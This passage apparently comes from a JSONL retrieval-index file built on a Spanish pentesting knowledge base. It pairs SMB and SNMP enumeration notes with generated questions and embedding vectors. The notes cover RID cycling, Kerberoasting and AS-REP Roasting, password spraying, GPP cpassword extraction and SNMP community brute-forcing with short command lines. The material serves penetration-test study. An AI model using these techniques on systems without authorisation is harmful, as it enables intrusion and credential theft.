`smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` para el `remark` completo.\n- Usuarios UNIX locales (`S-1-22-1`) solo los pilla `enum4linux -a` (RID cycling), **no** `enumdomusers`.\n- Automatiza la red entera con Bucles bash sobre IPs.", "indexar": "cual programa puedo usar para enumerar usuarios locales en redes Unix que no detecta enumdomusers?", "v": [-0.19287, 0.02024, -0.19123, -0.13386, 0.00863, 0.00345, -0.12625, -0.03763, -0.11387, -0.14465, -0.12987, -0.1076, -0.08061, -0.07318, -0.00425, -0.11302, 0.00823, -0.00503, 0.11945, -0.07407, -0.06106, -0.03595, -0.10841, 0.01025, -0.01514, 0.04521, -0.02742, -0.14507, -0.01463, -0.01237, 0.02756, -0.06724, 0.01694, -0.07561, -0.06755, -0.04596, 0.01928, 0.00827, -0.00024, 0.16657, 0.15452, 0.06425, -0.17217, -0.09643, 0.08039, 0.06405, -0.10909, -0.13912, -0.00994, -0.08789, -0.05416, 0.00863, -0.12761, -0.07254, -0.02257, -0.12928, 0.12137, -0.11813, -0.04135, 0.03615, 0.02021, -0.06768, 0.03185, 0.03574, -0.01843, -0.076, 0.02366, 0.10297, -0.05988, 0.0503, 0.06797, 0.07561, 0.10312, -0.04184, 0.02441, 0.1263, -0.02834, -0.03756, 0.0957, -0.00287, 0.0134, -0.05323, 0.04379, 0.03557, -0.13614, -0.03192, 0.08977, -0.05203, 0.00193, -0.03459, -0.0116, 0.02818, 0.04811, -0.00322, 0.09713, -0.06622, 0.09252, -0.02873, -4e-05, 0.04069, 0.04837, -0.07048, -0.1316, 0.11066, -0.01321, -0.00899, 0.03183, 0.04422, 0.00309, -0.08671, 0.08169, -0.0364, -0.06563, 0.00555, -0.12108, 0.0335, -0.00706, 0.00315, 0.07375, -0.01638, -0.02844, 0.00897, -0.02486, -0.06015, 0.13643, 0.0237, -0.01431, 0.10679, 0.00504, 0.02656, 0.01155, 0.0041, -0.01175, -0.079, -0.09682, -0.06622, -0.03905, -0.03224, -0.03876, 0.00036, -0.01567, 0.02192, -0.03292, 0.03076, 0.03599, 0.02712, -0.04718, -0.05406, -0.06143, 0.04054, 0.04341, -0.00291, -0.10863, 0.02258, -0.1103, 0.0678, 0.02646, -0.02413, -0.09557, -0.01546, -0.0224, -0.03725, 0.02191, -0.03333, 0.0074, -0.04654, -0.00792, 0.04766, 0.07862, 0.06262, -0.01852, 0.10123, 0.01295, -0.09546, -0.02481, -0.00689, -0.02454, -0.03482, -0.01934, -0.00273, -0.04992, -0.00054, 0.04901, 0.03292, 0.00179, -0.03226, 0.0073, 0.04502, -0.02859, 0.01716, -0.05258, -0.0274, 0.03515, 0.01055, 0.05783, -0.02885, 0.05069, 0.05904, 0.00786, -0.0587, -0.01982, -0.02323, -0.03319, 0.04392, 0.06577, 0.0572, -0.03436, -0.03743, 0.05574, 0.06138, 0.0005, -0.06561, 0.01438, 0.02582, -0.02759, -0.07024, 0.03258, -0.03079, -0.02058, 0.00262, -0.03572, -0.03264, 0.02351, 0.05708, -0.00515, 0.00476, -0.03588, -0.02997, -0.00873, -0.00514, 0.0251, -0.07886, -0.03501, -0.03284, -0.02619, -0.08861, 0.00972, 0.03614, -0.00635, -0.05351, -0.03767, 0.06272, 0.01469, 0.02502, -0.03807, -0.0147, -0.09709, 0.0046, 0.01073, 0.00059, -0.02093, 0.04682, 0.04292, -0.01461, 0.01218, 0.05217]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- `smbclient -L` **trunca** comentarios β†’ usa `rpcclient netshareenumall` para el `remark` completo.\n- Usuarios UNIX locales (`S-1-22-1`) solo los pilla `enum4linux -a` (RID cycling), **no** `enumdomusers`.\n- Automatiza la red entera con Bucles bash sobre IPs.", "indexar": "con que me ayudo a automatizar la exploraciΓ³n completa de una red mediante bucles sobre direcciones IP?", "v": [0.06205, -0.00869, -0.13807, -0.06271, 0.06871, -0.06337, -0.03142, -0.13379, -0.12763, -0.09561, -0.06254, -0.13675, -0.08684, -0.00569, 0.02228, -0.03894, -0.08604, -0.06512, 0.02083, -0.07656, 0.14127, -0.01189, -0.09808, 0.04181, -0.00486, 0.11687, -0.0291, 0.02657, -0.05728, -0.13514, -0.13448, 0.01696, -0.02879, -0.02009, -0.08211, -0.18481, 0.11829, 0.05498, -0.07249, 0.08777, -0.11432, 0.04163, -0.11634, 0.10377, 0.1175, 0.05785, 0.0292, -0.01243, -0.047, -0.07807, -0.13197, -0.104, -0.19299, -0.06047, -0.01384, -0.02272, 0.11177, 0.01854, 0.01602, 0.01081, 0.02327, 0.05524, 0.00285, 0.06977, 0.01928, -0.10059, 0.03088, -0.04708, -0.07056, 0.05246, 0.0614, 0.01775, -0.10511, 0.10652, 0.05384, 0.05489, -0.02671, 0.01876, 0.10973, 0.01431, -0.01058, 0.07785, -0.11843, 0.05416, -0.03999, -0.03222, 0.1063, -0.18339, -0.03378, -0.05076, 0.06735, -0.00386, -0.01767, 0.03532, 0.02143, 0.03464, 0.02117, 0.0556, -0.0057, 0.0308, 0.01788, 0.06988, -0.06354, 0.09232, 0.10571, 0.12991, 0.08603, -0.02613, 0.10524, -0.02206, -0.05884, 0.00766, 0.03959, -0.12215, 0.03596, -0.03952, -0.02464, 0.01891, 0.03766, -0.09597, -0.03654, -0.03761, -0.00054, 0.01444, -0.03793, -0.00946, -0.05419, 0.08251, 0.00877, 0.00687, 0.04983, 0.01114, -0.0865, -0.08026, 0.03856, 0.01596, -0.03119, -0.07363, 0.02024, -0.04853, 0.05813, 0.0149, -0.06538, -0.06905, 0.09566, 0.0321, 0.03694, -0.10678, 0.01623, 0.05472, -0.04997, -0.03077, 0.0565, 0.07284, -0.05462, 0.06903, 0.05782, 0.02665, 0.04247, 0.0706, 0.04933, 0.00601, -0.01433, -0.02351, 0.03707, -0.03705, -0.07564, -0.01269, 0.03555, -0.03929, -0.05684, 0.02571, -0.08987, 0.00126, -0.05215, 0.02781, -0.06428, -0.05079, 0.05337, -0.04182, 0.02725, -0.03818, -0.00597, -0.03751, 0.00934, -0.03032, 0.04331, -0.0322, 0.02077, 0.03643, 0.0614, -0.07313, -0.00114, 0.07118, 0.02786, -0.01334, -0.0256, -0.02531, -0.05689, -0.01386, 0.00384, 0.04155, -0.04441, 0.01879, -0.03584, 0.02995, -0.00422, 0.0268, -0.00711, 0.01716, 0.07064, -0.03974, 0.10029, -0.08707, -0.13364, -0.01006, 0.06519, -0.03767, -0.00852, -0.02384, 0.04943, 0.01504, -0.02573, -0.00019, -0.0399, 0.04588, 0.04689, 0.02159, 0.0429, -0.02784, -0.04431, 0.04051, -0.03813, 0.0141, 0.01943, 0.0121, 0.05657, 0.02552, -0.03821, -0.09012, 0.01828, 0.04703, 0.01105, -0.04526, -0.02219, -0.08918, -0.10266, 0.01785, -0.02643, -0.02327, -0.03762, 0.06156, -0.00031, -0.02589, -0.00983, -0.0005]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SesiΓ³n nula β†’ siguiente paso\nUsuarios vΓ‘lidos β†’ AS-REP Roasting, Kerberoasting, spraying (Pass-the-Hash).\nShares con `Groups.xml` β†’ GPP cpassword.\n\nRelacionado: SNMP Β· Active Directory Β· OSCP MOC", "indexar": "quΓ© herramienta se usa para roasting de credenciales como AS-REP o Kerberoasting?", "v": [-0.07306, -0.18061, 0.05159, -0.03718, 0.15626, -0.07756, -0.02209, 0.06808, 0.02439, -0.06519, -0.25019, -0.01236, -0.0217, -0.08532, 0.30607, 0.03154, -0.13835, 0.15849, 0.06232, 0.1034, -0.02021, -0.05034, -0.13807, 0.08516, 0.02754, 0.10379, 0.08681, -0.04352, -0.02187, 0.1477, -0.02365, 0.04994, -0.05148, -0.01581, -0.19542, 0.02414, -0.08964, 0.07571, 0.02077, 0.15033, -0.07101, 0.04489, -0.03094, 0.09251, 0.00511, 0.03117, -0.0833, -0.03504, -0.07322, 0.10783, 0.01982, -0.12533, -0.06481, -0.01093, 0.09894, 0.01356, 0.08787, -0.17511, -0.03047, -0.05371, -0.06998, -0.02568, -0.04839, -0.02715, -0.04197, -0.08945, -0.04705, -0.14562, 0.03299, -0.00156, -0.04715, -0.00437, 0.092, -0.00303, -0.01021, 0.00261, 0.07388, 0.05478, 0.03656, -0.05978, -0.00314, -0.10014, -0.0142, 0.07873, 0.04717, -0.09785, 0.09027, -0.0111, 0.01442, -0.01617, 0.00067, 0.06374, -0.01427, 0.05386, 0.08091, -0.0657, -0.06998, 0.01847, -0.05139, -0.01963, 0.06821, -0.08787, -0.0561, 0.00665, -0.05554, 0.005, 0.01138, 0.00928, 0.01598, -0.03899, 0.07298, 0.0472, -0.06526, -0.02037, -0.00647, 0.09923, -0.00339, -0.04009, 0.01111, -0.01531, 0.00381, 0.06918, -0.0144, 0.05003, 0.0258, 0.0479, -0.06373, 0.08069, -0.05929, -0.08992, 0.00925, -0.05125, -0.07294, 0.09019, 0.05554, -0.03186, -0.03155, -0.10031, -0.06141, -0.0793, -0.03556, 0.02514, -0.03995, -0.05539, -0.04912, -0.00476, -0.01688, 0.00181, 0.03376, -0.06084, -0.01926, -0.00214, -0.02655, -0.01263, -0.00519, -0.03849, -0.0633, 0.02613, -0.04454, 0.02573, -0.07035, -0.0903, 0.08974, -0.01696, 0.0414, 0.02696, 0.03585, 0.03434, 0.09104, 0.02402, 0.04551, 0.00205, 0.03441, 0.00952, 0.04714, -0.00878, -0.00645, 0.01767, -0.05659, -0.04275, 0.01776, -0.02124, 0.07119, 0.01726, -0.00521, 0.01122, 0.01559, -0.02775, -0.01199, -0.00556, 0.03029, -0.02443, 0.05546, -0.05814, 0.03927, 0.01752, 0.00734, -0.02372, -0.0107, 0.04997, -0.10798, 0.00343, -0.02309, -0.02634, 0.01202, 0.06918, 0.00856, -0.01805, -0.03756, 0.0513, 0.02927, -0.02366, 0.04907, -0.02391, 0.00742, 0.03864, -0.01052, 0.01767, -0.09727, -0.01495, 0.09267, -0.02308, 0.0197, 0.01241, -0.02204, 0.04319, -0.01046, 0.02973, -0.05958, -0.0096, 0.05098, -0.00203, -0.04137, -0.0009, -0.0113, -0.07742, -0.04428, 0.0012, -0.02874, 0.03183, -0.04162, -0.02069, 0.00835, 0.00984, 0.0027, 0.03257, -0.02527, -0.00676, 0.01912, -0.00881, -0.02038, -0.04761, -0.02514, -0.03682, 0.02393, -0.07155]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SesiΓ³n nula β†’ siguiente paso\nUsuarios vΓ‘lidos β†’ AS-REP Roasting, Kerberoasting, spraying (Pass-the-Hash).\nShares con `Groups.xml` β†’ GPP cpassword.\n\nRelacionado: SNMP Β· Active Directory Β· OSCP MOC", "indexar": "con quΓ© puedo obtener contraseΓ±as de usuarios vΓ‘lidos desde un dominio?", "v": [0.04261, 0.13161, -0.04627, -0.10818, -0.06542, -0.01864, 0.04264, -0.14063, -0.15614, -0.05063, 0.0209, -0.09562, 0.01302, -0.165, -0.02335, -0.00518, 0.20038, 0.01454, 0.00889, 0.03392, 0.02643, -0.14124, -0.05924, -0.02721, -0.01746, -0.03886, 0.01193, -0.06483, -0.01087, 0.11231, 0.06575, -0.09314, -0.01863, 0.00147, -0.00897, 0.06551, 0.0401, 0.21511, 0.08901, 0.0916, 0.1181, -0.00209, -0.15591, 0.01664, -0.04358, 0.03751, -0.05885, -0.03191, 0.04848, -0.14681, -0.02399, -0.10928, -0.11581, -0.08324, -0.02908, -0.06715, 0.1547, -0.03318, 0.02801, -0.02824, -0.12776, 0.01124, 0.03147, 0.15735, -0.10278, -0.16569, 0.09255, 0.08067, -0.07122, 0.09648, -0.00783, 0.01177, -0.03784, 0.02779, 0.09806, -0.01107, 0.05919, -0.06593, 0.04355, 0.04738, 0.02713, -0.00938, 0.00997, -0.1201, -0.1129, -0.05197, -0.03871, -0.12358, 0.06327, -0.03745, 0.10641, 0.04067, 0.02444, -0.03335, -0.06114, -0.05779, 0.00256, -0.06977, -0.09365, -0.04183, -0.0118, 0.1325, -0.03986, 0.13235, 0.08257, 0.04135, 0.01526, -0.03849, 0.03092, -0.07353, -0.00778, -0.08242, -0.086, -0.01271, -0.0277, 0.07703, -0.05772, -0.08124, 0.03855, 0.00129, -0.07932, -0.06493, 0.00633, -0.01884, 0.06616, 0.08083, 0.0671, -0.00697, -0.07636, -0.13872, -0.0031, -0.04419, -0.03405, -0.02053, -0.016, 0.08165, 0.03797, -0.07306, -0.10088, 0.04401, -0.05191, -0.01414, -0.06531, -0.01678, 0.00584, -0.0327, 0.00844, -0.11052, -0.05312, -0.07756, -0.06737, -0.00109, -0.04756, 0.05834, -0.00329, 0.09594, -0.08323, -0.06681, -0.04859, 0.06526, -0.0199, -0.00739, -0.06113, 0.04148, -0.03484, -0.02922, 0.00217, 0.01473, 0.0162, 0.06895, -0.01733, 0.05194, 0.01485, -0.01312, 0.0229, -0.02241, -0.0213, -0.03607, -0.00948, -0.0762, -0.01907, -0.0632, 0.00194, 0.02482, -0.03439, 0.01155, 0.07468, 0.03192, 0.01676, 0.01115, 0.03132, 0.03103, -0.01648, 0.05887, 0.00327, -0.02873, 0.00119, -0.0004, -0.04134, -0.06188, -0.0106, 0.00115, 0.01212, -0.01386, 0.02163, -0.02382, -0.04164, -0.04647, 0.01555, -0.02448, -0.00283, -0.00121, 0.01135, -0.07534, -0.06153, -0.03361, -0.0165, 0.02726, -0.01818, -0.07615, -0.03377, 0.04136, 0.0122, 0.02778, 0.01941, -0.02529, -0.03551, -0.01948, 0.05061, 0.04102, 0.0124, 0.00482, -0.02715, 0.00737, 0.08454, -0.01752, -0.02616, -0.02324, -0.02367, 0.01601, -0.06742, 0.03429, 0.04789, -0.04328, -0.04424, -0.04818, -0.03753, 0.02344, -0.01976, -0.01597, -0.03248, 0.02531, 0.01193, 0.00137, -0.03852, -0.01521]} +{"tipo": "pregunta", "herramienta": "SMB", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SMB.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## SesiΓ³n nula β†’ siguiente paso\nUsuarios vΓ‘lidos β†’ AS-REP Roasting, Kerberoasting, spraying (Pass-the-Hash).\nShares con `Groups.xml` β†’ GPP cpassword.\n\nRelacionado: SNMP Β· Active Directory Β· OSCP MOC", "indexar": "cuΓ‘l es una tΓ©cnica para capturar hashes a travΓ©s del servicio Shares con Groups.xml?", "v": [0.24098, -0.06636, -0.01316, -0.06847, 0.05536, -0.18646, 0.00237, -0.03695, 0.10971, 0.04408, -0.17007, 0.02795, -0.0704, 0.0509, 0.07081, 0.03541, 0.08672, -0.00602, 0.02437, 0.0909, -0.04509, 0.08031, -0.1781, -0.08523, -0.08786, -0.13845, -0.01126, -0.06443, -0.21795, -0.01166, 0.01892, -0.05348, -0.09877, -0.00014, -0.05065, -0.11432, -0.0129, 0.1353, 0.01593, -0.02893, -0.10083, -0.02512, -0.16337, 0.04078, 0.04854, -0.08603, 0.01121, 0.05082, -0.00459, -0.05183, 0.04695, 0.11303, -0.22456, -0.06656, -0.10848, -0.02837, 0.05451, -0.04475, -0.08442, -0.06366, 0.02912, -0.00758, -0.02728, -0.01393, -0.00319, -0.14549, -0.03907, 0.01745, -0.08637, 0.03194, 0.10596, 0.01296, 0.015, 0.03597, -0.04792, -0.00757, -0.06921, -0.0024, 0.00012, 0.02382, 0.06425, -0.05432, -0.02778, -0.03504, -0.02963, 0.0037, 0.02433, -0.0373, -0.0168, -0.18642, 0.10869, 0.06058, 0.06842, -0.03517, 0.043, -0.01183, 0.00913, 0.0324, -0.05611, -0.01654, 0.04701, -0.04868, -0.12832, 0.08421, -0.05158, 0.0422, -0.00117, -0.02082, -0.04422, -0.02405, 0.01596, 0.00823, -0.02938, 0.09144, -0.06576, -0.07655, 0.01811, -0.06539, -0.00173, -0.00037, -0.02836, 0.02806, 0.05449, -0.06701, 0.06676, -0.01572, -0.00903, 0.01461, 0.04959, -0.05684, -0.04077, 0.06558, -0.08188, 0.02938, 0.02364, -0.0188, 0.17128, -0.00962, -0.0233, -0.08031, -0.03283, -0.021, -0.03264, -0.02389, 0.08091, 0.01362, 0.01657, -0.02737, -0.04067, -0.03216, 0.02132, -0.00421, -0.05415, 0.00398, -0.02814, 0.02466, 0.00197, -0.09969, -0.08437, 0.06202, 0.01564, -0.05391, 0.06487, -0.05403, -0.02643, -0.05806, -0.04932, -0.07608, 0.02089, -0.0068, -0.01022, -0.04143, -0.0522, -0.06715, 0.02975, 0.00356, -0.04509, -0.05054, 0.026, -0.05384, -0.08129, 0.02698, 0.09891, 0.02083, 0.00871, -0.00215, -0.02727, 0.06815, 0.01466, -0.01103, -0.05564, -0.05566, -0.07391, 0.01746, 0.00072, -0.13207, -0.00219, 0.00598, 0.00848, -0.01611, -0.03451, -0.00469, -0.008, -0.02119, 0.00539, -0.01767, -0.01459, -0.01482, -0.04711, -0.00636, -0.01924, 0.05489, 0.06337, -0.01878, -0.05123, 0.01772, -0.01636, 0.02701, -0.00145, 0.11282, -0.02602, 0.04656, 0.04895, 0.05397, -0.00351, -0.0052, 0.02366, 0.0546, -0.00231, -0.02601, 0.02117, 0.00283, -0.01401, 0.03047, 0.05384, 0.0214, 0.03005, -0.01715, -0.04601, -0.04169, 0.08061, 0.06575, -0.08441, 0.00315, -0.01488, -0.03212, -0.09793, 0.0534, 0.02712, -0.08116, 0.02079, 0.01143, 0.03917, -0.00798, 0.05616, -0.05775]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# SNMP\n\n> Puerto **UDP 161** (Simple Network Management Protocol). RecuΓ©rdalo: es **UDP** (`nmap -sU`), no TCP. Parte de Puertos olvidados.", "indexar": "que programa puedo usar para escanear el puerto UDP 161?", "v": [-0.09388, -0.1119, -0.20446, -0.15183, 0.06107, 0.01982, 0.10216, -0.17331, -0.11723, -0.01868, -0.08317, 0.04744, -0.03311, -0.14257, -0.30117, -0.17723, -0.02721, 0.03755, 0.07381, 0.02953, 0.01238, 0.05086, -0.05263, -0.00958, 0.01488, 0.09687, -0.07504, 0.00225, 0.00288, -0.07115, 0.05779, 0.15824, -0.00896, -0.09133, 0.00143, -0.10748, 0.08227, -0.03202, 0.13912, 0.13445, 0.08902, -0.00564, -0.06298, -0.06256, 0.14687, 0.04559, -0.01084, 0.03922, -0.03727, -0.00986, -0.04666, 0.05384, -0.0323, 0.05682, 0.00996, -0.02045, 0.01455, 0.0282, -0.04058, -0.00179, 0.03252, 0.01993, -0.00933, -0.05061, -0.06316, -0.0283, 0.05024, 0.07621, -0.13257, 0.05082, -0.06211, 0.03199, 0.04226, -0.0058, -0.02275, -0.04253, -0.05479, -0.00034, 0.04613, 0.02653, -0.08736, -0.01398, -0.01707, 0.07347, -0.07999, -0.03331, 0.07968, -0.05324, 0.03916, -0.11146, -0.0086, -0.02643, 0.03065, 0.13515, 0.05339, -0.08099, 0.02198, 0.1003, -0.00461, 0.06086, 0.05172, -0.01715, -0.06096, 0.04439, -0.00071, 0.05806, 0.03609, -0.11531, 0.00298, 0.06088, 0.00686, 0.01947, -0.08229, -0.10462, -0.09588, -0.02692, -0.05971, -0.05957, 0.0478, -0.04683, -0.04746, -0.02855, -0.03889, -0.03168, 0.12346, -0.01008, 0.0479, 0.09367, -0.01084, 0.06114, 0.0335, -0.00756, -0.07758, -0.02907, -0.10285, -0.06993, -0.01363, -0.06429, 0.03784, 0.02089, -0.03978, 0.10488, -0.03179, -0.00488, 0.02957, 0.06428, -0.04961, -0.07749, 0.04336, -0.04617, 0.09382, 0.00203, -0.07292, 0.01004, -0.05679, -0.01745, 0.07724, -0.04311, -0.0838, 0.01531, -0.0884, -0.00251, -0.03789, -0.00359, 0.06777, -0.10356, 0.02107, 0.05083, 0.01718, 0.00322, 0.02848, 0.12797, 0.03, -0.04377, 0.02123, 0.02436, -0.02608, -0.04448, -0.0123, 0.01452, -0.09251, 0.06814, 0.03804, -0.00567, -0.01873, -0.0325, -0.02165, -0.01873, 0.0274, 0.03166, -0.02321, 0.03877, 0.03298, -0.04015, -0.05442, 0.00889, 0.01167, -0.01966, 0.03692, -0.08308, -0.01533, -0.01181, -0.00143, -0.06369, 0.04358, 0.06951, -0.06828, 0.01615, 0.02997, 0.08815, 0.00383, -0.07684, 0.06424, -0.0186, -0.00603, -0.02412, -0.04892, 0.02733, 0.06725, 0.03348, 0.00605, 0.04086, -0.00224, 0.06747, 0.00059, -0.04521, 0.02079, 0.00439, 0.00707, 0.04068, 0.01147, -0.00247, -0.02026, -0.06912, -0.00828, -0.0153, -0.0291, 0.04415, -0.02943, -0.04942, -0.00661, 0.06475, -0.00657, -0.0299, 0.02798, -0.02275, -0.07411, 0.06108, -0.00341, 0.02242, 0.00196, 0.05076, 0.01118, -0.06287, 0.02576, 0.04761]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# SNMP\n\n> Puerto **UDP 161** (Simple Network Management Protocol). RecuΓ©rdalo: es **UDP** (`nmap -sU`), no TCP. Parte de Puertos olvidados.", "indexar": "con que herramienta puedo comprobar si un dispositivo responde en SNMP sin usar TCP?", "v": [-0.1138, 0.05979, -0.31251, -0.18324, 0.02709, -0.145, -0.12503, -0.02082, -0.053, 0.01396, -0.11158, 0.07296, 0.05171, -0.10258, -0.06475, 0.06471, -0.01069, -0.12698, 0.06971, 0.05542, 0.05653, -0.07132, -0.07211, -0.12665, 0.05373, 0.11002, 0.01256, -0.03293, -0.13659, -0.08014, -0.00716, 0.00835, 0.02171, 0.00598, -0.14469, -0.00705, -0.05774, 0.02605, 0.00557, 0.08535, 0.03269, -0.00462, -0.07348, 0.03561, 0.03599, 0.08142, -0.00613, -0.07369, -0.07297, 0.06469, -0.08187, -0.03795, -0.14273, 0.00715, -0.17295, -0.09058, 0.19172, 0.00226, 0.10161, -0.11776, -0.04176, 0.00342, -0.09514, -0.07072, 0.00353, -0.06515, -0.00481, -0.0289, -0.09093, -0.01299, -0.06714, 0.02417, -0.00882, 0.01433, 0.02062, 0.02113, -0.07525, -0.0138, 0.14926, 0.0457, 0.06192, -0.0416, -0.08472, -0.03572, -0.0606, -0.04449, 0.10807, -0.0302, -0.03257, -0.08896, -0.01671, 0.1146, 0.03423, 0.03864, 0.00377, -0.11086, 0.03407, -0.0495, 0.04801, 0.01216, 0.21133, 0.01514, -0.06745, 0.0549, -0.07606, -0.02422, 0.04539, -0.02834, 0.0191, -0.08011, -0.02323, 0.01178, -0.09801, -0.00844, -0.074, 0.01785, -0.04083, -0.06613, -0.04161, -0.04104, 0.03939, 0.04746, -0.02032, -0.07705, 0.11524, 0.01288, 0.02865, 0.04705, 0.06571, 0.00238, 0.02516, -0.04809, -0.0252, -0.01948, -0.03269, -0.04131, -0.02583, -0.05298, 0.00381, -0.02876, 0.03953, 0.0232, -0.03369, -0.09815, 0.06704, -0.01786, -0.01563, -0.04291, -0.03173, 0.06156, 0.08341, -0.06112, -0.04002, 0.03285, 0.0031, 0.03762, 0.02672, -0.04563, -0.08519, 0.06585, -0.07791, -0.04451, 0.0318, 0.05125, 0.00853, -0.06645, 0.02041, 0.02372, 0.03678, -0.02449, 0.00501, 0.02646, 0.0675, -0.0106, 0.0376, -0.07773, -0.02025, 0.03039, 0.02471, -0.08526, -0.06265, 0.01133, -0.052, -0.06442, 0.04027, -0.00783, 0.03913, -0.01578, 0.01532, 0.01911, 0.01937, 0.08849, 0.08066, 0.02771, 0.02307, -0.03635, 0.01556, -0.0322, 0.02643, -0.00377, -0.05331, 0.00812, -0.04163, -0.07089, 0.03871, 0.02577, -0.04224, 0.04724, 0.0072, 0.01965, 0.01663, 0.00156, 0.09142, -0.01374, -0.03564, -0.01605, 0.01262, 0.08276, -0.04607, 0.00777, 0.07451, 0.00493, 0.05185, 0.0153, -0.02629, 0.01356, -0.01021, 0.02443, 0.02259, -0.01962, 0.02583, 0.01066, 0.02972, -0.02223, 0.03504, -0.01839, 0.0202, -0.01528, -0.06089, -0.02561, -0.0156, 0.01962, 0.00804, -0.00697, -0.04635, -0.00249, -0.04338, -0.01652, -0.01797, -0.08533, 0.01949, 0.04181, 0.07655, -0.0478, -0.0139, 0.01876]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# SNMP\n\n> Puerto **UDP 161** (Simple Network Management Protocol). RecuΓ©rdalo: es **UDP** (`nmap -sU`), no TCP. Parte de Puertos olvidados.", "indexar": "cual es una alternativa a nmap para probar puertos no estΓ‘ndar como 161?", "v": [0.14789, -0.02623, -0.08973, -0.08144, -0.06088, -0.01309, 0.12419, -0.14303, -0.27052, -0.0236, -0.02391, 0.01826, 0.11867, -0.01781, -0.17021, -0.04604, -0.0564, -0.05537, 0.10813, 0.13747, -0.12035, -0.04972, -0.17337, -0.02877, 0.03554, 0.02768, -0.05044, 0.01365, -0.07594, -0.03732, 0.01253, -0.02146, 0.1227, -0.06222, -0.04748, -0.03398, 0.15109, -0.02427, 0.04266, 0.11529, 0.04971, -0.02272, 0.06872, 0.00454, 0.09162, -0.01933, -0.12173, 0.02078, -0.04444, -0.01158, -0.02627, 0.09508, -0.03194, 0.09137, -0.03274, 0.01362, 0.07512, 0.01362, -0.02003, -0.04002, -0.0353, -0.01093, -0.06088, -0.09943, -0.06755, -0.07317, -0.0713, 0.03196, -0.1783, -0.01197, 0.00294, -0.02492, -0.05308, -0.00499, -0.04903, -0.01731, 0.01229, -0.03196, 0.07482, 0.02553, 0.07396, -0.05535, -0.03953, -0.02946, -0.03319, -0.12757, -0.02141, -0.06886, 0.07334, -0.04513, 0.1092, -0.02147, 0.00915, 0.1583, -0.05993, -0.13251, 0.02103, -0.00059, -0.0136, 0.02369, 0.05443, 0.05957, -0.09919, 0.06918, -0.01278, -0.04732, -0.00839, -0.04791, 0.01532, 0.01237, 0.08183, 0.06344, -0.0703, -0.00527, 0.02394, -0.08635, -0.0083, -0.09098, -0.06903, 0.00674, -0.05768, -0.03267, -0.05883, 0.01339, 0.04762, 0.02595, 0.10616, 0.06, 0.07368, 0.09569, 0.03676, 0.02028, 0.02386, -0.01333, -0.10424, -0.0244, 0.04133, -0.11594, 0.01583, 0.0305, -0.04909, 0.10666, 0.00813, -0.07505, 0.03907, 0.03192, 0.01144, 0.02247, -0.03965, -0.02378, -0.00164, 0.05392, -0.07345, 0.05235, -0.11872, 0.01683, 0.01509, -0.06234, -0.02047, 0.11775, 0.01333, 0.03569, 0.03973, 0.04041, 0.02721, -0.07215, 0.01141, -0.04924, -0.00184, -0.07678, 0.04045, 0.06074, -0.06772, -0.05982, 0.06772, 0.04302, -0.06669, -0.07562, 0.01929, 0.00696, -0.03586, 0.07063, -0.06268, 0.01943, -0.07192, -0.10519, -0.02951, 0.00643, 0.00151, 0.10532, 0.00967, 0.00947, -0.0491, -0.04351, -0.04864, -0.0235, 0.00303, -0.04514, -0.03157, -0.07164, 0.01443, -0.03914, -0.02579, -0.05594, -0.01012, 0.016, -0.10732, 0.03565, -0.03166, 0.04987, 0.04052, -0.02101, 0.04586, 0.01469, -0.06001, 0.01541, -0.01955, -0.02938, 0.02553, 0.03823, 0.00192, 0.04312, -0.01278, 0.0912, -0.0161, 0.04347, 0.03609, 0.05036, -0.07501, 0.01978, 0.06259, 0.00902, -0.02884, 0.01991, 0.00763, 0.02001, 0.00108, 0.02572, -0.01221, -0.07957, 0.0543, 0.01055, -0.03923, -0.08461, 0.06722, -0.04656, -0.04727, 0.04398, -0.04081, 0.00562, -0.02227, 0.04265, 0.01943, -0.00555, 0.05042, -0.01933]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Herramientas\n```bash\nonesixtyone -c comm.txt IP/24 # descubre SNMP + fuerza community a la vez\nsnmpwalk -v2c -c public IP OID # recorre el Γ‘rbol de OIDs\nsnmp-check IP -c public # enumeraciΓ³n bonita y ordenada\nsnmpwalk -v2c -c public -Oa IP OID # -Oa = traduce hex a ASCII\n```", "indexar": "con que puedo descubrir la comunidad SNMP de un router", "v": [0.00199, -0.06909, -0.16493, -0.19541, -0.10636, -0.04031, -0.10684, -0.0095, -0.07225, -0.02548, -0.13461, -0.11938, 0.20381, -0.08367, -0.02028, 0.07242, -0.07077, -0.02032, 0.02666, 0.09784, -0.07458, -0.00721, 0.0588, 0.00917, 0.15878, -0.02833, 0.11416, 0.02828, 0.03345, 0.00442, -0.01087, 0.01465, -0.12009, 0.10002, -0.12278, -0.03618, 0.07512, 0.11926, 0.01502, -0.03046, 0.03059, -0.11413, -0.07497, -0.09665, 0.05028, 0.08679, -0.15377, -0.14661, 0.02489, -0.00729, -0.12383, 0.03759, -0.06484, -0.06596, -0.07973, 0.01919, 0.09364, -0.06333, 0.03179, -0.07292, -0.02658, -0.02246, -0.06209, -0.12821, -0.00997, -0.13817, -0.07811, -0.02681, -0.0044, 0.02051, -0.02773, 0.01426, 0.02065, -0.00942, -0.05619, 0.05138, -0.0278, 0.00334, 